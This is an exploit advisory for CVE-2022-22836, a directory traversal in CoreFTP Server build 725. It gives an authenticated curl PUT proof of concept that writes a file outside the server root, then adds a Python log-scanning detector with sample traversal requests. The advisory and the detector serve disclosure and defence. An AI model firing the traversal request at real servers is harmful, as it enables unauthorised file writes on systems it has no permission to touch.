# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
# Date: 08/01/2022
# Exploit Author: LiamInfosec
# Vendor Homepage: http://coreftp.com/
# Version: build 725 and below
# Tested on: Windows 10
# CVE : CVE-2022-22836

# Description:
CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

# Proof of Concept:
curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
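
For defenders, the request pattern described above (an authenticated HTTP PUT whose path climbs out of the served root with ../) can be hunted for in web access logs. The following is an added example, not part of the original advisory or CoreFTP's code; the Common Log Format layout, the sample lines, and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Common Log Format (assumed layout, not CoreFTP's own log format).
SAMPLE_LOG = """\
192.0.2.10 - alice [08/Jan/2022:10:00:01 +0000] "PUT /uploads/report.txt HTTP/1.1" 201 0
192.0.2.44 - bob [08/Jan/2022:10:02:13 +0000] "PUT /../../../../../../whoops HTTP/1.1" 201 0
192.0.2.44 - bob [08/Jan/2022:10:02:40 +0000] "PUT /uploads/%2e%2e/%2e%2e/%2e%2e/x HTTP/1.1" 201 0
192.0.2.10 - alice [08/Jan/2022:10:05:00 +0000] "GET /uploads/../index.html HTTP/1.1" 200 512
192.0.2.10 - alice [08/Jan/2022:10:06:00 +0000] "PUT /uploads/a/../b.txt HTTP/1.1" 201 0
"""

# client, ident (ignored), user, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so double-encoded dots (%252e) are also seen."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Windows servers also accept backslash as a separator.
    return path.replace("\\", "/")


def escapes_root(target):
    """True if '..' segments climb above the served root at any point."""
    depth = 0
    path = target.split("?", 1)[0]  # ignore any query string
    for seg in decode_fully(path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def find_traversal_puts(log_text):
    """Return (client, user, raw_target, status) for PUTs that escape the root."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(3).upper() == "PUT" and escapes_root(m.group(4)):
            hits.append((m.group(1), m.group(2), m.group(4), int(m.group(5))))
    return hits


if __name__ == "__main__":
    for hit in find_traversal_puts(SAMPLE_LOG):
        print(hit)
```

A 2xx status on a flagged line means the server accepted the write, so the account and the target path should be reviewed; a PUT such as /uploads/a/../b.txt that stays inside the root is not flagged.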